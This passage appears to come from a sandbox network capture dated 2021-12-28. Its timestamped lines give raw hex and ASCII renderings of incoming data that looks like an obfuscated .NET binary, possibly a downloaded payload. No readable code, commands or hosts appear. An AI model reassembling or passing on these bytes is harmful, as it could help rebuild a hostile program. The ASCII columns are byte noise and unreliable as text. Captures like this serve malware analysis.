                                                                                                                                                        2021-12-28 02:23:24 UTC17INData Raw: 1e 01 00 06 3a 5d db ff ff 26 20 a7 00 00 00 38 52 db ff ff fe 0c 45 00 20 0d 00 00 00 20 2f 00 00 00 20 21 00 00 00 58 9c 20 ff 00 00 00 38 33 db ff ff 11 50 16 3e 7e e5 ff ff 20 bf 00 00 00 28 1e 01 00 06 3a 1c db ff ff 26 20 7e 00 00 00 38 11 db ff ff 38 45 08 00 00 20 c5 00 00 00 28 1f 01 00 06 3a fd da ff ff 26 20 df 00 00 00 38 f2 da ff ff fe 0c 3e 00 20 1f 00 00 00 fe 0c 30 00 9c 20 57 00 00 00 38 da da ff ff fe 0c 3e 00 20 04 00 00 00 fe 0c 30 00 9c 20 40 02 00 00 38 c2 da ff ff 20 92 00 00 00 20 30 00 00 00 59 fe 0e 30 00 20 43 00 00 00 38 a9 da ff ff 11 09 11 6d 17 58 11 63 17 91 9c 20 6d 01 00 00 38 94 da ff ff 20 7b 00 00 00 20 48 00 00 00 58 fe 0e 34 00 20 9e 01 00 00 38 7b da ff ff 20 33 00 00 00 20 55 00 00 00 58 fe 0e 30 00 20 70 01 00 00
                                                                                                                                                        Data Ascii: :]& 8RE / !X 83P>~ (:& ~88E (:& 8> 0 W8> 0 @8 0Y0 C8mXc m8 { HX4 8{ 3 UX0 p
                                                                                                                                                        2021-12-28 02:23:24 UTC19INData Raw: 73 73 00 00 0a d0 2e 00 00 02 28 03 01 00 06 28 08 01 00 06 74 2e 00 00 02 80 6d 00 00 04 20 00 00 00 00 28 1f 01 00 06 39 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 75 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dd 97 04 00 00 26 20 00 00 00 00 28 1e 01 00 06 39 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 33 00 45 02 00 00 00 05 00 00 00 d9 00 00 00 38 00 00 00 00 00 11 04 73 73 00 00 0a d0 2e 00 00 02 28 03 01 00 06 28 08 01 00 06 13 2e 20 00 00 00 00 28 1f 01 00 06 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 5b 00 45 02 00 00 00 05 00 00 00 3f 00 00 00 38 00 00 00 00 d0 2e 00 00 02 28 03 01 00 06 11 2e 28 10 01 00 06 28 11 01 00 06 74 2e 00 00 02 80 6d 00 00 04 20 01 00 00 00 28 1f 01 00 06 3a bf ff ff ff 26 20 01 00 00 00 38
                                                                                                                                                        Data Ascii: ss.((t.m (9& 8uE8& (9& 83E8ss.((. (:& 8[E?8.(.((t.m (:& 8
                                                                                                                                                        2021-12-28 02:23:24 UTC20INData Raw: 00 20 08 00 00 00 fe 0c 34 00 9c 20 b5 00 00 00 28 1f 01 00 06 39 9a d0 ff ff 26 20 25 00 00 00 38 8f d0 ff ff 20 d4 00 00 00 20 46 00 00 00 59 fe 0e 34 00 20 79 00 00 00 fe 0e 6e 00 38 6e d0 ff ff fe 0c 45 00 20 02 00 00 00 20 d8 00 00 00 20 48 00 00 00 59 9c 20 33 02 00 00 38 53 d0 ff ff fe 0c 3e 00 20 10 00 00 00 20 95 00 00 00 20 31 00 00 00 59 9c 20 4b 02 00 00 fe 0e 6e 00 38 2c d0 ff ff 38 c5 fd ff ff 20 00 01 00 00 28 1f 01 00 06 39 1c d0 ff ff 26 20 91 00 00 00 38 11 d0 ff ff 20 32 00 00 00 20 01 00 00 00 58 fe 0e 30 00 20 27 01 00 00 38 f8 cf ff ff 38 17 f4 ff ff 20 40 01 00 00 28 1e 01 00 06 3a e4 cf ff ff 26 20 2f 01 00 00 38 d9 cf ff ff 11 09 11 01 19 58 11 0c 19 91 9c 20 1a 02 00 00 38 c4 cf ff ff fe 0c 3e 00 20 08 00 00 00 fe 0c 30 00 9c 20
                                                                                                                                                        Data Ascii: 4 (9& %8 FY4 yn8nE HY 38S> 1Y Kn8,8 (9& 8 2 X0 '88 @(:& /8X 8> 0
                                                                                                                                                        2021-12-28 02:23:24 UTC21INData Raw: 11 64 1a 5a 11 28 12 28 28 b0 00 00 06 26 20 4d 01 00 00 38 43 cb ff ff 28 d3 00 00 06 20 31 00 00 00 28 1e 01 00 06 39 2f cb ff ff 26 20 dc 00 00 00 38 24 cb ff ff 20 a3 00 00 00 20 36 00 00 00 59 fe 0e 34 00 20 f0 00 00 00 38 0b cb ff ff 11 3b 11 13 61 13 57 20 0e 01 00 00 38 fa ca ff ff 11 09 11 6d 1b 58 11 63 1b 91 9c 20 ff 01 00 00 38 e5 ca ff ff 20 d3 00 00 00 20 46 00 00 00 59 fe 0e 30 00 20 0e 02 00 00 38 cc ca ff ff 11 1c 1e 58 13 1c 20 48 02 00 00 38 bc ca ff ff 11 43 1d 1f 64 9c 20 96 00 00 00 38 ac ca ff ff fe 0c 45 00 20 0c 00 00 00 20 6a 00 00 00 20 76 00 00 00 58 9c 20 81 01 00 00 38 8d ca ff ff 11 43 1b 1f 74 9c 20 9c 01 00 00 38 7d ca ff ff 11 09 11 01 19 58 11 63 19 91 9c 20 56 00 00 00 38 68 ca ff ff fe 0c 3e 00 20 13 00 00 00 20 5b 00
                                                                                                                                                        Data Ascii: dZ(((& M8C( 1(9/& 8$ 6Y4 8;aW 8mXc 8 FY0 8X H8Cd 8E j vX 8Ct 8}Xc V8h> [
                                                                                                                                                        2021-12-28 02:23:24 UTC23INData Raw: 74 11 25 28 e3 00 00 06 39 af ff ff ff 20 03 00 00 00 38 a4 fe ff ff 1a 16 20 6f 76 00 00 20 01 46 00 00 73 74 00 00 0a 13 25 20 0b 00 00 00 38 87 fe ff ff 11 74 11 22 28 e2 00 00 06 39 7a ff ff ff 20 01 00 00 00 28 1e 01 00 06 39 6a fe ff ff 26 20 01 00 00 00 38 5f fe ff ff 11 4e 28 da 00 00 06 28 db 00 00 06 72 1e 0b 00 70 28 dc 00 00 06 3a 96 fe ff ff 20 00 00 00 00 28 1e 01 00 06 3a 35 fe ff ff 26 20 00 00 00 00 38 2a fe ff ff dd 4b d4 ff ff 11 5d 75 54 00 00 01 13 39 20 01 00 00 00 28 1e 01 00 06 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 26 00 45 03 00 00 00 37 00 00 00 26 00 00 00 05 00 00 00 38 32 00 00 00 11 39 28 e5 00 00 06 20 00 00 00 00 28 1f 01 00 06 3a d4 ff ff ff 26 20 00 00 00 00 38 c9 ff ff ff 11 39 39 0a 00 00 00 20 02 00 00
                                                                                                                                                        Data Ascii: t%(9 8 ov Fst% 8t"(9z (9j& 8_N((rp(: (:5& 8*K]uT9 (:& 8&E7&829( (:& 899
                                                                                                                                                        2021-12-28 02:23:24 UTC24INData Raw: 18 00 00 00 fe 0c 30 00 9c 20 94 00 00 00 38 96 c0 ff ff 12 35 17 8d 16 00 00 01 25 16 1f 2a 9c 7d 72 00 00 04 20 e9 01 00 00 38 7a c0 ff ff 20 24 00 00 00 20 74 00 00 00 58 fe 0e 30 00 20 f7 01 00 00 28 1f 01 00 06 3a 5c c0 ff ff 26 20 74 02 00 00 38 51 c0 ff ff 14 13 63 20 97 00 00 00 fe 0e 6e 00 38 3c c0 ff ff 11 09 11 6d 11 0f 16 91 9c 20 93 01 00 00 38 2d c0 ff ff 11 09 11 01 19 58 11 0f 19 91 9c 20 b8 00 00 00 fe 0e 6e 00 38 10 c0 ff ff 11 1b 11 64 1a 5a 1e 12 28 28 b0 00 00 06 26 20 c1 00 00 00 38 fb bf ff ff 7e 50 00 00 04 28 0c 01 00 06 13 2d 20 65 01 00 00 28 1f 01 00 06 3a e0 bf ff ff 26 20 68 01 00 00 38 d5 bf ff ff fe 0c 45 00 20 0a 00 00 00 fe 0c 34 00 9c 20 20 00 00 00 28 1e 01 00 06 39 b8 bf ff ff 26 20 a0 00 00 00 38 ad bf ff ff fe 0c 3e
                                                                                                                                                        Data Ascii: 0 85%*}r 8z $ tX0 (:\& t8Qc n8<m 8-X n8dZ((& 8~P(- e(:& h8E 4 (9& 8>
                                                                                                                                                        2021-12-28 02:23:24 UTC25INData Raw: 20 38 00 00 00 58 9c 20 56 02 00 00 38 3f bb ff ff 11 43 19 1f 6f 9c 20 51 02 00 00 38 2f bb ff ff fe 0c 3e 00 20 1a 00 00 00 fe 0c 30 00 9c 20 6f 01 00 00 38 17 bb ff ff 16 13 29 20 2e 01 00 00 38 0a bb ff ff 7e 0a 00 00 0a 11 6f 8e 69 20 00 10 00 00 1f 40 28 1c 01 00 06 13 36 20 22 02 00 00 28 1f 01 00 06 39 e4 ba ff ff 26 20 0c 00 00 00 38 d9 ba ff ff 7f 62 00 00 04 28 71 00 00 0a 28 fe 00 00 06 13 0f 20 78 02 00 00 38 be ba ff ff 11 09 16 11 36 11 09 8e 69 28 cc 00 00 06 20 7e 02 00 00 28 1e 01 00 06 3a a1 ba ff ff 26 20 be 01 00 00 38 96 ba ff ff 20 5b 00 00 00 20 38 00 00 00 58 fe 0e 30 00 20 c5 00 00 00 38 7d ba ff ff 11 5e 8e 69 1a 5b 13 38 20 9d 00 00 00 fe 0e 6e 00 38 63 ba ff ff 11 09 11 6d 19 58 11 0f 19 91 9c 20 83 00 00 00 38 52 ba ff ff fe
                                                                                                                                                        Data Ascii: 8X V8?Co Q8/> 0 o8) .8~oi @(6 "(9& 8b(q( x86i( ~(:& 8 [ 8X0 8}^i[8 n8cmX 8R
                                                                                                                                                        2021-12-28 02:23:24 UTC27INData Raw: 01 00 00 38 ef b5 ff ff d0 29 00 00 02 28 03 01 00 06 6f 24 00 00 0a 28 0e 01 00 06 28 12 01 00 06 8e 69 18 40 2f 15 00 00 20 64 01 00 00 28 1e 01 00 06 3a bf b5 ff ff 26 20 37 00 00 00 38 b4 b5 ff ff fe 0c 3e 00 20 0e 00 00 00 20 86 00 00 00 20 2c 00 00 00 59 9c 20 c4 00 00 00 28 1f 01 00 06 3a 90 b5 ff ff 26 20 b6 01 00 00 38 85 b5 ff ff 20 ef 00 00 00 20 4f 00 00 00 59 fe 0e 30 00 20 5b 02 00 00 38 6c b5 ff ff 11 1e 28 f3 00 00 06 16 13 65 20 00 00 00 70 3f bc db ff ff 20 67 00 00 00 38 4e b5 ff ff fe 0c 45 00 20 03 00 00 00 fe 0c 34 00 9c 20 28 00 00 00 fe 0e 6e 00 38 2e b5 ff ff 11 43 1d 1f 74 9c 20 31 01 00 00 38 22 b5 ff ff 28 d3 00 00 06 20 03 00 00 00 28 1f 01 00 06 3a 0e b5 ff ff 26 20 53 00 00 00 38 03 b5 ff ff fe 0c 3e 00 20 01 00 00 00 fe 0c
                                                                                                                                                        Data Ascii: 8)(o$((i@/ d(:& 78> ,Y (:& 8 OY0 [8l(e p? g8NE 4 (n8.Ct 18"( (:& S8>
                                                                                                                                                        2021-12-28 02:23:24 UTC28INData Raw: 00 00 59 fe 0e 30 00 20 47 01 00 00 38 8d b0 ff ff 11 20 28 eb 00 00 06 20 31 00 00 00 38 7c b0 ff ff 20 31 00 00 00 20 30 00 00 00 59 fe 0e 34 00 20 2f 01 00 00 28 1e 01 00 06 3a 5e b0 ff ff 26 20 1b 01 00 00 38 53 b0 ff ff 1f 38 17 28 ce 00 00 06 28 fc 00 00 06 28 fd 00 00 06 13 12 20 b4 01 00 00 38 35 b0 ff ff fe 0c 45 00 20 0a 00 00 00 fe 0c 34 00 9c 20 07 02 00 00 28 1f 01 00 06 39 18 b0 ff ff 26 20 21 00 00 00 38 0d b0 ff ff 11 15 17 58 13 15 20 20 00 00 00 28 1f 01 00 06 3a f8 af ff ff 26 20 7f 00 00 00 38 ed af ff ff 16 13 2c 20 99 01 00 00 38 e0 af ff ff fe 0c 3e 00 20 0b 00 00 00 20 16 00 00 00 20 03 00 00 00 58 9c 20 82 01 00 00 38 c1 af ff ff 20 6e 00 00 00 20 53 00 00 00 59 fe 0e 34 00 20 6c 01 00 00 fe 0e 6e 00 38 a0 af ff ff 18 13 6d 20 b8
                                                                                                                                                        Data Ascii: Y0 G8 ( 18| 1 0Y4 /(:^& 8S8((( 85E 4 (9& !8X (:& 8, 8> X 8 n SY4 ln8m
                                                                                                                                                        2021-12-28 02:23:24 UTC29INData Raw: ff ff 26 20 66 00 00 00 38 38 ab ff ff 28 f4 00 00 06 25 17 28 f5 00 00 06 11 0e 11 20 28 f6 00 00 06 13 4c 20 08 00 00 00 28 1f 01 00 06 39 12 ab ff ff 26 20 07 00 00 00 38 07 ab ff ff 16 13 28 20 4a 02 00 00 38 fa aa ff ff 11 09 11 6d 1b 58 11 0c 1b 91 9c 20 38 02 00 00 38 e5 aa ff ff 11 1e 11 55 28 ea 00 00 06 13 0d 20 4c 00 00 00 28 1e 01 00 06 39 cb aa ff ff 26 20 6e 00 00 00 38 c0 aa ff ff 11 09 11 01 18 58 11 0f 18 91 9c 20 79 01 00 00 38 ab aa ff ff 16 13 17 20 65 00 00 00 38 9e aa ff ff 20 44 00 00 00 20 1f 00 00 00 58 fe 0e 30 00 20 15 00 00 00 28 1f 01 00 06 3a 80 aa ff ff 26 20 53 01 00 00 38 75 aa ff ff fe 0c 3e 00 20 05 00 00 00 fe 0c 30 00 9c 20 e1 01 00 00 38 5d aa ff ff fe 0c 3e 00 20 18 00 00 00 20 82 00 00 00 20 2b 00 00 00 59 9c 20 aa
                                                                                                                                                        Data Ascii: & f88(%( (L (9& 8( J8mX 88U( L(9& n8X y8 e8 D X0 (:& S8u> 0 8]> +Y
                                                                                                                                                        2021-12-28 02:23:24 UTC31INData Raw: ff ff ff 7e 50 00 00 04 11 61 73 6f 00 00 0a 11 61 73 6f 00 00 0a 11 61 73 6f 00 00 0a 20 7d 1d ea 0c 11 61 73 6f 00 00 0a 12 73 6f 2f 01 00 06 26 20 02 00 00 00 28 1e 01 00 06 3a 23 ff ff ff 26 20 00 00 00 00 38 18 ff ff ff 38 5c ff ff ff 20 01 00 00 00 28 1e 01 00 06 39 04 ff ff ff 26 20 01 00 00 00 38 f9 fe ff ff 16 e0 13 61 20 04 00 00 00 38 eb fe ff ff dd 44 01 00 00 14 13 11 20 00 00 00 00 28 1f 01 00 06 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 4d 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dc 20 02 00 00 00 38 29 fd ff ff 73 72 00 00 0a 13 16 20 07 00 00 00 28 1e 01 00 06 3a 13 fd ff ff 26 20 07 00 00 00 38 08 fd ff ff 38 6e fd ff ff 20 08 00 00 00 28 1f 01 00 06 3a f4 fc ff ff 26 20 10 00 00 00 38 e9 fc ff ff 11 16 28 d4 00 00 06 8d
                                                                                                                                                        Data Ascii: ~Pasoasoaso }asoso/& (:#& 88\ (9& 8a 8D (:& 8ME8 8)sr (:& 88n (:& 8(
                                                                                                                                                        2021-12-28 02:23:24 UTC32INData Raw: ff 00 00 00 13 48 20 76 02 00 00 28 1e 01 00 06 3a 7e a0 ff ff 26 20 d0 00 00 00 38 73 a0 ff ff 20 6b 00 00 00 20 60 00 00 00 58 fe 0e 34 00 20 aa 00 00 00 38 5a a0 ff ff 38 e0 c2 ff ff 20 49 02 00 00 38 4b a0 ff ff fe 0c 3e 00 20 0f 00 00 00 fe 0c 30 00 9c 20 44 00 00 00 38 33 a0 ff ff 11 43 17 1f 73 9c 20 86 01 00 00 fe 0e 6e 00 38 1b a0 ff ff fe 0c 3e 00 20 08 00 00 00 20 67 00 00 00 20 73 00 00 00 58 9c 20 38 00 00 00 38 00 a0 ff ff fe 0c 3e 00 20 1a 00 00 00 fe 0c 30 00 9c 20 4a 00 00 00 28 1f 01 00 06 3a e3 9f ff ff 26 20 4a 00 00 00 38 d8 9f ff ff 11 5e 8e 69 1a 5d 13 50 20 0f 02 00 00 28 1f 01 00 06 39 c1 9f ff ff 26 20 17 01 00 00 38 b6 9f ff ff 11 43 1e 1f 2e 9c 20 c0 00 00 00 38 a6 9f ff ff fe 0c 3e 00 20 01 00 00 00 20 52 00 00 00 20 67 00 00
                                                                                                                                                        Data Ascii: H v(:~& 8s k `X4 8Z8 I8K> 0 D83Cs n8> g sX 88> 0 J(:& J8^i]P (9& 8C. 8> R g
                                                                                                                                                        2021-12-28 02:23:24 UTC33INData Raw: 03 2a 00 00 51 00 00 00 54 2a 00 00 0a 01 00 00 0a 00 00 01 02 00 00 00 71 59 00 00 32 01 00 00 a3 5a 00 00 30 00 00 00 00 00 00 00 00 00 00 00 a4 57 00 00 48 04 00 00 ec 5b 00 00 32 00 00 00 0a 00 00 01 1b 30 04 00 fb 00 00 00 13 00 00 11 02 74 32 00 00 01 6f 79 00 00 0a 28 7a 00 00 0a 39 11 00 00 00 02 74 32 00 00 01 6f 79 00 00 0a 0a dd d3 00 00 00 dd 06 00 00 00 26 dd 00 00 00 00 00 02 74 32 00 00 01 6f 7b 00 00 0a 6f 7c 00 00 0a 6f 77 00 00 0a 72 90 0b 00 70 72 01 00 00 70 6f 7d 00 00 0a 28 7a 00 00 0a 39 2a 00 00 00 02 74 32 00 00 01 6f 7b 00 00 0a 6f 7c 00 00 0a 6f 77 00 00 0a 72 90 0b 00 70 72 01 00 00 70 6f 7d 00 00 0a 0a dd 6f 00 00 00 dd 06 00 00 00 26 dd 00 00 00 00 00 02 6f 76 00 00 0a 72 a2 0b 00 70 6f 7e 00 00 0a 02 16 8d 0a 00 00 01 6f 7f
                                                                                                                                                        Data Ascii: *QT*qY2Z0WH[20t2oy(z9t2oy&t2o{o|owrprpo}(z9*t2o{o|owrprpo}o&ovrpo~o
                                                                                                                                                        2021-12-28 02:23:24 UTC34INData Raw: 03 28 8d 00 00 0a 39 02 00 00 00 17 2a 02 39 06 00 00 00 03 3a 02 00 00 00 16 2a 16 0a 16 0b 16 0c 16 0d 02 7e 61 00 00 04 6f 8e 00 00 0a 39 2a 00 00 00 17 0a 02 1a 6f 8f 00 00 0a 02 1b 6f 8f 00 00 0a 1e 62 60 02 1c 6f 8f 00 00 0a 1f 10 62 60 02 1d 6f 8f 00 00 0a 1f 18 62 60 0c 03 7e 61 00 00 04 6f 8e 00 00 0a 39 2a 00 00 00 17 0b 03 1a 6f 8f 00 00 0a 03 1b 6f 8f 00 00 0a 1e 62 60 03 1c 6f 8f 00 00 0a 1f 10 62 60 03 1d 6f 8f 00 00 0a 1f 18 62 60 0d 06 3a 08 00 00 00 07 3a 02 00 00 00 16 2a 06 3a 07 00 00 00 02 28 b8 00 00 06 0c 07 3a 07 00 00 00 03 28 b8 00 00 06 0d 08 09 fe 01 2a 00 00 00 72 72 86 0c 00 70 6f 61 00 00 0a 16 26 26 18 8d 16 00 00 01 25 16 17 9c 25 17 18 9c 2a 00 00 00 72 72 ba 0c 00 70 6f 61 00 00 0a 16 26 26 18 8d 16 00 00 01 25 16 17 9c
                                                                                                                                                        Data Ascii: (9*9:*~ao9*oob`ob`ob`~ao9*oob`ob`ob`::*:(:(*rrpoa&&%%*rrpoa&&%
                                                                                                                                                        2021-12-28 02:23:24 UTC36INData Raw: 29 00 00 0a 2a 00 3e 00 fe 09 00 00 fe 09 01 00 28 83 00 00 0a 2a 3e 00 fe 09 00 00 fe 09 01 00 28 a8 00 00 06 2a 2a fe 09 00 00 6f 34 01 00 06 2a 00 2e 00 fe 09 00 00 28 b4 00 00 0a 2a 2e 00 fe 09 00 00 28 b5 00 00 0a 2a 2e 00 fe 09 00 00 28 b6 00 00 0a 2a 2a fe 09 00 00 6f b7 00 00 0a 2a 00 2a fe 09 00 00 6f b8 00 00 0a 2a 00 3e 00 fe 09 00 00 fe 09 01 00 28 b9 00 00 0a 2a 2a fe 09 00 00 6f ba 00 00 0a 2a 00 3e 00 fe 09 00 00 fe 09 01 00 28 4a 00 00 0a 2a 2a fe 09 00 00 6f 4c 00 00 0a 2a 00 2a fe 09 00 00 6f bb 00 00 0a 2a 00 2a fe 09 00 00 6f bc 00 00 0a 2a 00 2a fe 09 00 00 28 76 00 00 0a 2a 00 3a fe 09 00 00 fe 09 01 00 6f bd 00 00 0a 2a 00 2e 00 fe 09 00 00 28 be 00 00 0a 2a 2e 00 fe 09 00 00 28 bf 00 00 0a 2a 2a fe 09 00 00 6f c0 00 00 0a 2a 00 2e
                                                                                                                                                        Data Ascii: )*>(*>(**o4*.(*.(*.(**o**o*>(**o*>(J**oL**o**o**(v*:o*.(*.(**o*.
                                                                                                                                                        2021-12-28 02:23:24 UTC37INData Raw: aa 1e 00 00 7e 03 00 00 1d 32 00 00 ec 18 00 00 b6 16 00 00 d8 32 00 00 56 1c 00 00 c7 00 00 00 de 0c 00 00 81 1f 00 00 1f 0d 00 00 c2 27 00 00 2b 35 00 00 1d 33 00 00 17 17 00 00 42 26 00 00 9b 06 00 00 8a 19 00 00 d1 1d 00 00 eb 26 00 00 38 2e 00 00 7f 04 00 00 77 32 00 00 b2 25 00 00 a3 24 00 00 03 12 00 00 61 26 00 00 ab 17 00 00 c4 2b 00 00 90 32 00 00 05 00 00 00 dd 2b 00 00 0e 1a 00 00 ef 02 00 00 90 28 00 00 ae 02 00 00 c5 15 00 00 62 1f 00 00 8d 0e 00 00 e3 30 00 00 81 1a 00 00 73 06 00 00 09 1e 00 00 17 14 00 00 ea 1a 00 00 44 31 00 00 df 20 00 00 06 2a 00 00 38 21 00 00 4e 2f 00 00 54 20 00 00 4e 0d 00 00 03 0a 00 00 1b 15 00 00 11 09 00 00 6e 0b 00 00 33 15 00 00 8b 24 00 00 9b 22 00 00 5b 01 00 00 c2 2a 00 00 85 31 00 00 48 13 00 00 8c 00 00
                                                                                                                                                        Data Ascii: ~22V'+53B&&8.w2%$a&+2+(b0sD1 *8!N/T Nn3$"[*1H
                                                                                                                                                        2021-12-28 02:23:24 UTC38INData Raw: ff ff 38 4a 1d 00 00 20 70 01 00 00 28 72 01 00 06 3a b4 f7 ff ff 26 20 40 00 00 00 38 a9 f7 ff ff fe 0c 11 00 20 15 00 00 00 20 a8 00 00 00 20 38 00 00 00 59 9c 20 74 00 00 00 fe 0e 29 00 38 82 f7 ff ff fe 0c 00 00 20 02 00 00 00 fe 0c 09 00 9c 20 36 00 00 00 38 6e f7 ff ff 20 6e 00 00 00 20 59 00 00 00 59 fe 0e 28 00 20 29 00 00 00 38 55 f7 ff ff fe 0c 11 00 20 0a 00 00 00 20 4d 00 00 00 20 1c 00 00 00 58 9c 20 98 01 00 00 28 73 01 00 06 3a 31 f7 ff ff 26 20 b5 01 00 00 38 26 f7 ff ff fe 0c 11 00 20 1d 00 00 00 fe 0c 28 00 9c 20 ce 00 00 00 28 73 01 00 06 3a 09 f7 ff ff 26 20 d6 00 00 00 38 fe f6 ff ff fe 0c 00 00 20 05 00 00 00 fe 0c 09 00 9c 20 24 01 00 00 38 e6 f6 ff ff 20 9e 00 00 00 20 4e 00 00 00 59 fe 0e 28 00 20 9e 00 00 00 38 cd f6 ff ff 20 67
                                                                                                                                                        Data Ascii: 8J p(r:& @8 8Y t)8 68n n YY( )8U M X (s:1& 8& ( (s:& 8 $8 NY( 8 g
                                                                                                                                                        2021-12-28 02:23:24 UTC40INData Raw: 00 00 00 38 69 f2 ff ff fe 0c 11 00 20 1a 00 00 00 fe 0c 28 00 9c 20 30 00 00 00 38 51 f2 ff ff fe 0c 00 00 20 04 00 00 00 fe 0c 09 00 9c 20 aa 01 00 00 38 39 f2 ff ff 20 90 00 00 00 20 2e 00 00 00 58 fe 0e 09 00 20 4a 00 00 00 28 73 01 00 06 3a 1b f2 ff ff 26 20 6b 00 00 00 38 10 f2 ff ff 11 10 11 26 61 13 04 20 4a 01 00 00 38 ff f1 ff ff fe 0c 00 00 20 01 00 00 00 20 cf 00 00 00 20 45 00 00 00 59 9c 20 6f 00 00 00 28 72 01 00 06 3a db f1 ff ff 26 20 39 00 00 00 38 d0 f1 ff ff fe 0c 11 00 20 16 00 00 00 20 f5 00 00 00 20 51 00 00 00 59 9c 20 d0 00 00 00 28 72 01 00 06 3a ac f1 ff ff 26 20 53 00 00 00 38 a1 f1 ff ff fe 0c 00 00 20 01 00 00 00 fe 0c 09 00 9c 20 74 01 00 00 38 89 f1 ff ff fe 0c 00 00 20 02 00 00 00 20 65 00 00 00 20 6f 00 00 00 58 9c 20 4f
                                                                                                                                                        Data Ascii: 8i ( 08Q 89 .X J(s:& k8&a J8 EY o(r:& 98 QY (r:& S8 t8 e oX O
                                                                                                                                                        2021-12-28 02:23:24 UTC41INData Raw: ed ff ff fe 0c 11 00 20 02 00 00 00 20 38 00 00 00 20 35 00 00 00 58 9c 20 a0 01 00 00 38 f6 ec ff ff fe 0c 00 00 20 0f 00 00 00 fe 0c 09 00 9c 20 2d 00 00 00 38 de ec ff ff fe 0c 11 00 20 16 00 00 00 fe 0c 28 00 9c 20 0d 01 00 00 28 72 01 00 06 3a c1 ec ff ff 26 20 46 00 00 00 38 b6 ec ff ff fe 0c 11 00 20 10 00 00 00 fe 0c 28 00 9c 20 03 00 00 00 38 9e ec ff ff fe 0c 11 00 20 15 00 00 00 fe 0c 28 00 9c 20 4a 00 00 00 28 72 01 00 06 39 81 ec ff ff 26 20 7b 00 00 00 38 76 ec ff ff fe 0c 11 00 20 03 00 00 00 fe 0c 28 00 9c 20 a2 01 00 00 38 5e ec ff ff 20 b2 00 00 00 20 3b 00 00 00 59 fe 0e 28 00 20 21 01 00 00 38 45 ec ff ff fe 0c 00 00 20 04 00 00 00 fe 0c 09 00 9c 20 16 00 00 00 38 2d ec ff ff 20 88 00 00 00 20 2d 00 00 00 59 fe 0e 28 00 20 49 00 00 00
                                                                                                                                                        Data Ascii: 8 5X 8 -8 ( (r:& F8 ( 8 ( J(r9& {8v ( 8^ ;Y( !8E 8- -Y( I
                                                                                                                                                        2021-12-28 02:23:24 UTC43INData Raw: 01 00 00 38 b7 e7 ff ff 20 af 00 00 00 20 3a 00 00 00 59 fe 0e 28 00 20 65 00 00 00 38 9e e7 ff ff fe 0c 11 00 20 01 00 00 00 20 a6 00 00 00 20 37 00 00 00 59 9c 20 41 00 00 00 38 7f e7 ff ff 16 13 10 20 40 01 00 00 fe 0e 29 00 38 6a e7 ff ff 20 e0 00 00 00 20 6d 00 00 00 59 fe 0e 09 00 20 e5 00 00 00 38 55 e7 ff ff 20 c4 00 00 00 20 41 00 00 00 59 fe 0e 28 00 20 5e 00 00 00 fe 0e 29 00 38 34 e7 ff ff fe 0c 11 00 20 19 00 00 00 fe 0c 28 00 9c 20 7d 00 00 00 38 20 e7 ff ff 20 42 00 00 00 20 4e 00 00 00 58 fe 0e 28 00 20 0e 00 00 00 fe 0e 29 00 38 ff e6 ff ff 20 64 00 00 00 20 79 00 00 00 58 fe 0e 09 00 20 07 00 00 00 28 72 01 00 06 3a e5 e6 ff ff 26 20 07 00 00 00 38 da e6 ff ff 20 80 00 00 00 20 15 00 00 00 59 fe 0e 28 00 20 a6 00 00 00 28 72 01 00 06 3a
                                                                                                                                                        Data Ascii: 8 :Y( e8 7Y A8 @)8j mY 8U AY( ^)84 ( }8 B NX( )8 d yX (r:& 8 Y( (r:
                                                                                                                                                        2021-12-28 02:23:24 UTC44INData Raw: 00 00 00 58 fe 0e 09 00 20 d9 00 00 00 38 54 e2 ff ff fe 0c 00 00 20 01 00 00 00 20 cc 00 00 00 20 44 00 00 00 59 9c 20 84 01 00 00 28 72 01 00 06 3a 30 e2 ff ff 26 20 0c 01 00 00 38 25 e2 ff ff 20 21 00 00 00 20 31 00 00 00 58 fe 0e 28 00 20 e0 00 00 00 38 0c e2 ff ff fe 0c 11 00 20 17 00 00 00 20 2b 00 00 00 20 23 00 00 00 58 9c 20 84 00 00 00 fe 0e 29 00 38 e5 e1 ff ff fe 0c 00 00 20 0a 00 00 00 20 b6 00 00 00 20 3c 00 00 00 59 9c 20 3c 00 00 00 28 72 01 00 06 3a c5 e1 ff ff 26 20 18 00 00 00 38 ba e1 ff ff 11 0a 73 21 00 00 0a 16 73 ca 00 00 0a 13 25 20 4c 00 00 00 38 a1 e1 ff ff 20 80 00 00 00 20 2a 00 00 00 59 fe 0e 09 00 20 6f 01 00 00 28 73 01 00 06 39 83 e1 ff ff 26 20 55 00 00 00 38 78 e1 ff ff fe 0c 00 00 20 0d 00 00 00 20 f0 00 00 00 20 50 00
                                                                                                                                                        Data Ascii: X 8T DY (r:0& 8% ! 1X( 8 + #X )8 <Y <(r:& 8s!s% L8 *Y o(s9& U8x P
                                                                                                                                                        2021-12-28 02:23:24 UTC45INData Raw: 00 59 9c 20 10 00 00 00 28 73 01 00 06 39 fb dc ff ff 26 20 04 00 00 00 38 f0 dc ff ff fe 0c 11 00 20 08 00 00 00 20 19 00 00 00 20 32 00 00 00 58 9c 20 69 00 00 00 fe 0e 29 00 38 c9 dc ff ff 20 3a 00 00 00 20 0c 00 00 00 58 fe 0e 09 00 20 13 01 00 00 28 72 01 00 06 3a af dc ff ff 26 20 17 00 00 00 38 a4 dc ff ff 11 12 39 52 16 00 00 20 31 00 00 00 28 72 01 00 06 3a 8e dc ff ff 26 20 0d 00 00 00 38 83 dc ff ff 11 1e 16 3e b4 08 00 00 20 54 00 00 00 38 71 dc ff ff fe 0c 11 00 20 17 00 00 00 fe 0c 28 00 9c 20 99 01 00 00 28 72 01 00 06 3a 54 dc ff ff 26 20 7a 00 00 00 38 49 dc ff ff 11 24 17 58 13 24 20 2f 00 00 00 38 39 dc ff ff fe 0c 11 00 20 0e 00 00 00 20 b6 00 00 00 20 3c 00 00 00 59 9c 20 9d 00 00 00 38 1a dc ff ff fe 0c 00 00 20 0e 00 00 00 fe 0c 09
                                                                                                                                                        Data Ascii: Y (s9& 8 2X i)8 : X (r:& 89R 1(r:& 8> T8q ( (r:T& z8I$X$ /89 <Y 8
